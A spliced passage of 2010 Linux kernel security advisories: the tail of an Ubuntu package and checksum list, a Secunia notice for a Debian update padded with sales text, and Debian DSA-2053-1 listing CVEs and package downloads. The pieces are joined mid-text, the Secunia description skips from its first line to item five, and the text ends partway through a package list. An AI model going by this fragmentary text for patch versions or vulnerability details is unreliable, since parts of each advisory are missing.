http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   223066 00121583edd924fe1757fa727ce876f3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   217338 72c2573434f500ed671fa00582074ca7\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   259842 55eca2948a90fd62fa2e4ff0a9af80c9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   296094 bfda8ec67edf7abd1478a60b126995ac\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   131886 ad03d7e0dbe804de4593e2fb86ebc4d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   154672 b67bb554dccec4c27d6accfbc97de8e4\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    50974 ee184ba015afebe43b7d67545684a609\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    45510 62e72d83114e691e6644f77328eae811\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   108060 869c7fefad265a86e620a08b85dccca2\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   123884 14b554ea470bda34e64f0d1df7fc6516\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    84352 1f3ffcebad40e4289c58fb81aec0855e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    89956 8f8f82acc6aad562a95d254c5fac022c\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    77236 e74748e50bc049e1ca8abd0babfcae76\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    28408 34f21190bd3bbd99cbcd25074d41faaa\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:     8958 91a68cc7a6fe6edf7ac0be03e165b4da\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    10186 b4b821de875ffd8607a5f867f42854cc\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    62110 8194a3936a0ec9bbdc1866f8201d7015\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    72518 009ef857c62f697f9ee69284634b274f\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   106886 da2d5917ae498c3078ebbd70ff3da14b\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   136600 e6165d5923d6aefd3f3398010ee23694\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  1648486 4f570da059c50025d135c0e3f75ccd5e\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  1575088 c836ac8e48f8d71fabddbba3b950c198\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    78218 eddd03eab6e34af5a232892afc3bca0a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    83474 0ef56c605b39df3e5edfb67682ae2c06\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    17454 c7dbbca300fc48245cd4cfcf51d5b35d\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    18520 94418ced4448d327ec47dc602c17241a\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    67940 7a38341b4bc2c79511068590fc302c01\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    80278 e54c3d70347bae3108d67b1bc2bc4516\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   152200 1dc38fce24ffad9be140b3948e356e05\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   159704 c78e3cd87f71f9a728004fd7e546cb50\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    22518 a83c7b1e9ffa2a3660bb41fbd3fcbaca\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    25778 b7471dba3ec7b8c05d5ea5739933fe93\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   146488 3b7be44529c4cc86514657ac7b12b12b\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    71440 aad8b8756f92832f4febd71db1f966dd\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    47602 3db40ba1ebd556f46b88da6dbed5c5d3\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    98038 101ce2471c33a479cf85df2b2e2c5211\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   591060 cf8fb919251529d57a1f318311b3707a\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   151664 20c364a8b683a0c4ba27567503cf5296\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    99356 e0c14c26cb974c7825f345cd70429841\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  3186134 44a50ae97caf252433b0ecfac295ec59\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb\n      Size/MD5:   652300 cd39dcccee9c7a771274cdf208530af6\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb\n      Size/MD5:   651290 f71657ec5a90274fe87615325f631740\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb\n      Size/MD5: 22598018 851cda52ff2ffdd88b0732c63f74b5c8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb\n      Size/MD5: 22149494 2e6f4fc8428d316ccf24367738ec4cdb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_sparc.deb\n      Size/MD5:   771020 0f4a6d78f1bfc4c66dec85397a1dfe38\n    http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb\n      Size/MD5:   198080 42b0b00c0a74c8f19e63959105f8312f\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   280878 fd57b5da83294769b64c507d1819bf0e\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   214702 5aacff2a187543bc7c03d401f68607be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    31894 37e7ede984e9a95085fef957bd24f9d3\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   337020 a60a63332965ca2e7eb04b9e5af55555\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  1765768 473b47001814ec3dcfe3f7d13b591ddf\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   246854 4fcf74412f97aaad8445b41a8568ed9d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   139988 d2f75d8b75b929fbf9220da8bdf7e589\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    39912 a365983317c1b3c4dda94e11903aff3b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   206902 462e5550a90007c8c5418938dd676f6b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:     9178 c9f2992677c044041a448845a7d38b11\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    64466 52cf00bc003b8b5701298fad5517731f\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   212946 fbbb948d246dbea1ce131546d8bf6c2e\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  1272618 4aec314341cdc776f20508b90866f5ae\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    96624 f0995ec49806ff5ede44bd80ff510d6e\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    17702 9eb7b43e2289a69f9dcd478a5dc8d754\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   208204 b7724ff354d34b60cf7e2c5f50e61637\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   193306 12a8a53ca0ef921b491d73d2bc051f73\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    27206 6ae9400c4f74471e4b0baa8e12220191\n\n. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. ----------------------------------------------------------------------\n\n\nStay Compliant\n\nAlerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions\n\nFree Trial\nhttp://secunia.com/products/corporate/evm/trial/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nDebian update for linux-2.6\n\nSECUNIA ADVISORY ID:\nSA39830\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/39830/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=39830\n\nRELEASE DATE:\n2010-05-26\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/39830/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/39830/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=39830\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nDebian has issued an update for linux-2.6. \n\n5) The \"nfs_release_request()\" function in fs/nfs/pagelist.c can be\ninterrupted, which can be exploited to e.g. cause a NULL pointer\ndereference by killing an application while it performs certain\nactions on an NFS file. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nDebian credits:\n1) Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from\nCodenomicon Ltd. \n2) Neil Hormon\n3) Wufei\n4) Sachin Prabhu\n5) Trond Myklebust\n\nORIGINAL ADVISORY:\nDSA 2053-1:\nhttp://lists.debian.org/debian-security-announce/2010/msg00096.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n.  Fixes for\nCVE-2010-0419 caused failures when using KVM in certain situations. \nThis update reverts that fix until a better solution can be found. \n\nWe apologize for the inconvenience. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2053-1                security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nMay 25, 2010                        http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : privilege escalation/denial of service/information leak\nProblem type   : local\nDebian-specific: no\nCVE Id(s)      : CVE-2009-4537 CVE-2010-0727 CVE-2010-1083 CVE-2010-1084\n                 CVE-2010-1086 CVE-2010-1087 CVE-2010-1088 CVE-2010-1162\n                 CVE-2010-1173 CVE-2010-1187 CVE-2010-1437 CVE-2010-1446\n                 CVE-2010-1451\nDebian Bug(s)  : 573071\n                 \nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. \n\nCVE-2010-0727\n\n    Sachin Prabhu reported an issue in the GFS2 filesystem. \n\nCVE-2010-1083\n\n    Linus Torvalds reported an issue in the USB subsystem, which may allow\n    local users to obtain portions of sensitive kernel memory. \n\nCVE-2010-1087\n\n    Trond Myklebust reported an issue in the NFS filesystem. This has an unknown\n    security impact. \n\nCVE-2010-1173\n\n    Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from\n    Codenomicon Ltd reported an issue in the SCTP subsystem that allows\n    a remote attacker to cause a denial of service using a malformed init\n    package. \n\nCVE-2010-1187\n\n    Neil Hormon reported an issue in the TIPC subsystem. \n\nCVE-2010-1437\n\n    Toshiyuki Okajima reported a race condition in the keyring subsystem. \n\nCVE-2010-1446\n\n    Wufei reported an issue with kgdb on the PowerPC architecture,\n    allowing local users to write to kernel memory. Note: this issue\n    does not affect binary kernels provided by Debian. The fix is\n    provided for the benefit of users who build their own kernels\n    from Debian source. \n\nCVE-2010-1451\n\n    Brad Spengler reported an issue on the SPARC architecture that allows\n    local users to execute non-executable pages. See the referenced Debian bug page for details. \n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-22lenny1. \n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux\npackages. \n\nThe following matrix lists additional source packages that were\nrebuilt for compatibility with or to take advantage of this update:\n\n                                             Debian 5.0 (lenny)\n     user-mode-linux                         2.6.26-1um-2+22lenny1\n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\n    Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc\n    Size/MD5 checksum:     5778 713b8a3f2bc10816264a81c0a9eb7860\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz\n    Size/MD5 checksum:  7894925 86ecf2ca8808aea84b0af06317616a6c\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:   126228 be9c5c392a1ab0cf0a297063abf983f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  1764832 b0d63ac0b12a0679867b8b53bf4c3a54\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  2871892 c5c0e0d8ea193812566f9481e6ca8440\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum: 48764508 9a203c801fd068d282d1cbb11fbab68f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  4627886 fe792ad0bcf2c9f8ac4bb496e9885a20\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:   110906 6ef2c4468e55570a3e571021299d4760\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   374304 046703c72d1bf6bcc81cb462e0f4d7ec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   372708 a6922d1de2035d2745d5ad56a6e38eb9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 28676342 687312e7cdf46a79c7c4b974cbe5b542\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:  3620318 4c7448f11e8a63ddec95b7ddaf6e9c02\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 29374588 452a568c8f74d69e3b7ba6e1685d4863\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   373176 fbda1e3fb70a213ee26ab4e0a5af16a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   110428 82fc153ba577607964e55ce0d5eba8a8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   110404 9e24c63932b52a18206f951f18438a90\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   760714 dbef4d63df60be4c54e5a8999b2f1203\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 28661322 db654cfdd26ec48b75fbf73bae54d15b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   391290 529d0af88248eeb9db6c720147c3c9c9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  1809098 2119049dd7757d1a7aa9b0cb6d65a4e6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   753158 c06cd160c023755232e79c187b20a98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   391970 7e2145ea394dcbd739307b7cff343ffc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   387348 d76eb180fa81f742ee87d9524f3bc5a3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 20949852 a3c0bd81f9f9cc96d2e42521fb963fb9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3757248 db362b7459220059221418a2b1542659\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110338 19ec7c8ca6e51c0a93352a059f9d5df8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 19315990 c185e17d0ca1ed640106dbb828c919f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110374 0e703e2b4306ca1e68cc61460ef86686\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 21102730 604476ba9a35fdb435b4409e5323cf89\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3724662 ae8fed857d819d7a3dd5b3085c367085\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3780338 a2cd8cdd414be8c412bd923576ccb456\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3856722 9621b8e802a4e482de1db03572b0f72d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 20931422 9d71c45188552af06abd5a04d62b7c84\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110350 acdbea58008fec881f380752f9fc3ea6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   397220 709b723fefd37764ab8bffb079eb312f\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 12494622 96304f7aa2bddb3ea2ef404afaa4a513\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   352980 44e27ad26963a2c1dbed9240b28d7c5b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 10294730 8066047f7d15cd2f7a6c93018cfaae37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   369410 e26f28edccaeabf04dec8e4d2d8cc88f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 11443274 d9232ed2bbde0e851f72488a2eea831d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   110444 631821dedb019f48b3133246338f4521\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   751260 027d7225ddd40e26f12a9c7c7cc17b55\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:  4140556 a36e76af416da97176639d34a6dd42a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   368088 8388881b72ce56cef47cb61a51abfe8d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum: 11731284 cc6e8949fe66950db619eb2996332572\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   110404 611a83d9ddb07104525d3ae7eca714b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb\n    Size/MD5 checksum:   364180 878a5bd8fa6419dd6efe6422c7a14cbc\n\narmel architecture (ARM EABI)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb\n    Size/MD5 checksum:   365700 0327b96ec1802e56c4ffee19ce1c9dc5\n  